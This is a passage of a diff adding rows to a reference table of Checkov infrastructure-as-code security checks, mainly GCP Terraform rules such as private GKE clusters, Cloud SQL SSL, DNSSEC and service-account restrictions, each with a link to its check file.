+| 2396 | CKV2_DOCKER_16           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                        |
+| 2397 | CKV2_DOCKER_17           | resource                         | RUN                                                                                              | Ensure that 'chpasswd' is not used to set or remove passwords                                                                                                                                            | dockerfile              | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml)                                                                                                    |
+| 2398 | CKV_GCP_1                | resource                         | google_container_cluster                                                                         | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters                                                                                                                               | Terraform               | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py)                                                                                             |
+| 2399 | CKV_GCP_2                | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted ssh access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py)                                           |
+| 2400 | CKV_GCP_3                | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted rdp access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py)                                       |
+| 2401 | CKV_GCP_4                | resource                         | google_compute_ssl_policy                                                                        | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites                                                                                                                  | Terraform               | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py)                                                                                   |
+| 2402 | CKV_GCP_6                | resource                         | google_sql_database_instance                                                                     | Ensure all Cloud SQL database instance requires all incoming connections to use SSL                                                                                                                      | Terraform               | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py)                                                               |
+| 2403 | CKV_GCP_7                | resource                         | google_container_cluster                                                                         | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters                                                                                                                             | Terraform               | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py)                                                                                       |
+| 2404 | CKV_GCP_8                | resource                         | google_container_cluster                                                                         | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters                                                                                                                            | Terraform               | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py)                                                                                       |
+| 2405 | CKV_GCP_9                | resource                         | google_container_node_pool                                                                       | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters                                                                                                                                        | Terraform               | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py)                                                                       |
+| 2406 | CKV_GCP_10               | resource                         | google_container_node_pool                                                                       | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters                                                                                                                                       | Terraform               | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py)                                                                     |
+| 2407 | CKV_GCP_11               | resource                         | google_sql_database_instance                                                                     | Ensure that Cloud SQL database Instances are not open to the world                                                                                                                                       | Terraform               | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py)                                               |
+| 2408 | CKV_GCP_12               | resource                         | google_container_cluster                                                                         | Ensure Network Policy is enabled on Kubernetes Engine Clusters                                                                                                                                           | Terraform               | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py)                                                                                 |
+| 2409 | CKV_GCP_13               | resource                         | google_container_cluster                                                                         | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled                                                                                                                       | Terraform               | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py)                                                                       |
+| 2410 | CKV_GCP_14               | resource                         | google_sql_database_instance                                                                     | Ensure all Cloud SQL database instance have backup configuration enabled                                                                                                                                 | Terraform               | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py)                                                             |
+| 2411 | CKV_GCP_15               | resource                         | google_bigquery_dataset                                                                          | Ensure that BigQuery datasets are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py)                                                                   |
+| 2412 | CKV_GCP_16               | resource                         | google_dns_managed_zone                                                                          | Ensure that DNSSEC is enabled for Cloud DNS                                                                                                                                                              | Terraform               | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py)                                                                               |
+| 2413 | CKV_GCP_17               | resource                         | google_dns_managed_zone                                                                          | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC                                                                                                            | Terraform               | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py)                                                                     |
+| 2414 | CKV_GCP_18               | resource                         | google_container_cluster                                                                         | Ensure GKE Control Plane is not public                                                                                                                                                                   | Terraform               | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py)                                                                                     |
+| 2415 | CKV_GCP_20               | resource                         | google_container_cluster                                                                         | Ensure master authorized networks is set to enabled in GKE clusters                                                                                                                                      | Terraform               | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py)                                                           |
+| 2416 | CKV_GCP_21               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Clusters are configured with Labels                                                                                                                                                    | Terraform               | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py)                                                                                                       |
+| 2417 | CKV_GCP_22               | resource                         | google_container_node_pool                                                                       | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image                                                                                                                    | Terraform               | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py)                                                                                                   |
+| 2418 | CKV_GCP_23               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Cluster is created with Alias IP ranges enabled                                                                                                                                        | Terraform               | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py)                                                                                             |
+| 2419 | CKV_GCP_24               | resource                         | google_container_cluster                                                                         | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters                                                                                                                         | Terraform               | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py)                                                                         |
+| 2420 | CKV_GCP_25               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Cluster is created with Private cluster enabled                                                                                                                                        | Terraform               | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py)                                                                                 |
+| 2421 | CKV_GCP_26               | resource                         | google_compute_subnetwork                                                                        | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network                                                                                                                                   | Terraform               | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py)                                                                   |
+| 2422 | CKV_GCP_27               | resource                         | google_project                                                                                   | Ensure that the default network does not exist in a project                                                                                                                                              | Terraform               | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py)                                                                         |
+| 2423 | CKV_GCP_28               | resource                         | google_storage_bucket_iam_binding                                                                | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform               | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                                       |
+| 2424 | CKV_GCP_28               | resource                         | google_storage_bucket_iam_member                                                                 | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform               | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                                       |
+| 2425 | CKV_GCP_29               | resource                         | google_storage_bucket                                                                            | Ensure that Cloud Storage buckets have uniform bucket-level access enabled                                                                                                                               | Terraform               | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py)                                                               |
+| 2426 | CKV_GCP_30               | resource                         | google_compute_instance                                                                          | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 2427 | CKV_GCP_30               | resource                         | google_compute_instance_from_template                                                            | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 2428 | CKV_GCP_30               | resource                         | google_compute_instance_template                                                                 | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 2429 | CKV_GCP_31               | resource                         | google_compute_instance                                                                          | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 2430 | CKV_GCP_31               | resource                         | google_compute_instance_from_template                                                            | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 2431 | CKV_GCP_31               | resource                         | google_compute_instance_template                                                                 | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 2432 | CKV_GCP_32               | resource                         | google_compute_instance                                                                          | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 2433 | CKV_GCP_32               | resource                         | google_compute_instance_from_template                                                            | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 2434 | CKV_GCP_32               | resource                         | google_compute_instance_template                                                                 | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 2435 | CKV_GCP_33               | resource                         | google_compute_project_metadata                                                                  | Ensure oslogin is enabled for a Project                                                                                                                                                                  | Terraform               | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py)                                                                         |
+| 2436 | CKV_GCP_34               | resource                         | google_compute_instance                                                                          | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 2437 | CKV_GCP_34               | resource                         | google_compute_instance_from_template                                                            | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 2438 | CKV_GCP_34               | resource                         | google_compute_instance_template                                                                 | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 2439 | CKV_GCP_35               | resource                         | google_compute_instance                                                                          | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 2440 | CKV_GCP_35               | resource                         | google_compute_instance_from_template                                                            | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 2441 | CKV_GCP_35               | resource                         | google_compute_instance_template                                                                 | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 2442 | CKV_GCP_36               | resource                         | google_compute_instance                                                                          | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 2443 | CKV_GCP_36               | resource                         | google_compute_instance_from_template                                                            | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 2444 | CKV_GCP_36               | resource                         | google_compute_instance_template                                                                 | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 2445 | CKV_GCP_37               | resource                         | google_compute_disk                                                                              | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform               | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py)                                                                         |
+| 2446 | CKV_GCP_38               | resource                         | google_compute_instance                                                                          | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform               | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py)                                                                 |
+| 2447 | CKV_GCP_39               | resource                         | google_compute_instance                                                                          | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 2448 | CKV_GCP_39               | resource                         | google_compute_instance_from_template                                                            | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 2449 | CKV_GCP_39               | resource                         | google_compute_instance_template                                                                 | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 2450 | CKV_GCP_40               | resource                         | google_compute_instance                                                                          | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 2451 | CKV_GCP_40               | resource                         | google_compute_instance_from_template                                                            | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 2452 | CKV_GCP_40               | resource                         | google_compute_instance_template                                                                 | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 2453 | CKV_GCP_41               | resource                         | google_project_iam_binding                                                                       | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform               | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                                       |
+| 2454 | CKV_GCP_41               | resource                         | google_project_iam_member                                                                        | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform               | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                                       |
+| 2455 | CKV_GCP_42               | resource                         | google_project_iam_member                                                                        | Ensure that Service Account has no Admin privileges                                                                                                                                                      | Terraform               | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py)                                                               |
+| 2456 | CKV_GCP_43               | resource                         | google_kms_crypto_key                                                                            | Ensure KMS encryption keys are rotated within a period of 90 days                                                                                                                                        | Terraform               | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py)                                                                                 |
+| 2457 | CKV_GCP_44               | resource                         | google_folder_iam_binding                                                                        | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform               | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                                     |
+| 2458 | CKV_GCP_44               | resource                         | google_folder_iam_member                                                                         | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform               | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                                     |
+| 2459 | CKV_GCP_45               | resource                         | google_organization_iam_binding                                                                  | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform               | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                           |
+| 2460 | CKV_GCP_45               | resource                         | google_organization_iam_member                                                                   | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform               | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                           |
+| 2461 | CKV_GCP_46               | resource                         | google_project_iam_binding                                                                       | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform               | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                               |
+| 2462 | CKV_GCP_46               | resource                         | google_project_iam_member                                                                        | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform               | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                               |
+| 2463 | CKV_GCP_47               | resource                         | google_organization_iam_binding                                                                  | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform               | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                                       |
+| 2464 | CKV_GCP_47               | resource                         | google_organization_iam_member                                                                   | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform               | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                                       |
+| 2465 | CKV_GCP_48               | resource                         | google_folder_iam_binding                                                                        | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform               | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                                 |
+| 2466 | CKV_GCP_48               | resource                         | google_folder_iam_member                                                                         | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform               | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                                 |
+| 2467 | CKV_GCP_49               | resource                         | google_project_iam_binding                                                                       | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform               | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                                   |
+| 2468 | CKV_GCP_49               | resource                         | google_project_iam_member                                                                        | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform               | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                                   |
+| 2469 | CKV_GCP_50               | resource                         | google_sql_database_instance                                                                     | Ensure MySQL database 'local_infile' flag is set to 'off'                                                                                                                                                | Terraform               | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py)                                                                   |
+| 2470 | CKV_GCP_51               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on'                                                                                                                                         | Terraform               | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py)                                                         |
+| 2471 | CKV_GCP_52               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_connections' flag is set to 'on'                                                                                                                                         | Terraform               | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py)                                                           |
+| 2472 | CKV_GCP_53               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on'                                                                                                                                      | Terraform               | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py)                                                     |
+| 2473 | CKV_GCP_54               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on'                                                                                                                                          | Terraform               | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py)                                                             |
+| 2474 | CKV_GCP_55               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value                                                                                                                               | Terraform               | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py)                                                           |
+| 2475 | CKV_GCP_56               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_temp_files flag is set to '0'                                                                                                                                            | Terraform               | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py)                                                                       |
+| 2476 | CKV_GCP_57               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1'                                                                                                                              | Terraform               | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py)                                                         |
+| 2477 | CKV_GCP_58               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database 'cross db ownership chaining' flag is set to 'off'                                                                                                                                   | Terraform               | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py)                                       |
+| 2478 | CKV_GCP_59               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database 'contained database authentication' flag is set to 'off'                                                                                                                             | Terraform               | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py)                                     |
+| 2479 | CKV_GCP_60               | resource                         | google_sql_database_instance                                                                     | Ensure Cloud SQL database does not have public IP                                                                                                                                                        | Terraform               | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py)                                                                   |
+| 2480 | CKV_GCP_61               | resource                         | google_container_cluster                                                                         | Enable VPC Flow Logs and Intranode Visibility                                                                                                                                                            | Terraform               | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py)                                                                                       |
+| 2481 | CKV_GCP_62               | resource                         | google_storage_bucket                                                                            | Bucket should log access                                                                                                                                                                                 | Terraform               | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py)                                                                                         |
+| 2482 | CKV_GCP_63               | resource                         | google_storage_bucket                                                                            | Bucket should not log to itself                                                                                                                                                                          | Terraform               | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py)                                                                                 |
+| 2483 | CKV_GCP_64               | resource                         | google_container_cluster                                                                         | Ensure clusters are created with Private Nodes                                                                                                                                                           | Terraform               | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py)                                                                                                 |
+| 2484 | CKV_GCP_65               | resource                         | google_container_cluster                                                                         | Manage Kubernetes RBAC users with Google Groups for GKE                                                                                                                                                  | Terraform               | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py)                                                                     |
+| 2485 | CKV_GCP_66               | resource                         | google_container_cluster                                                                         | Ensure use of Binary Authorization                                                                                                                                                                       | Terraform               | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py)                                                                                   |
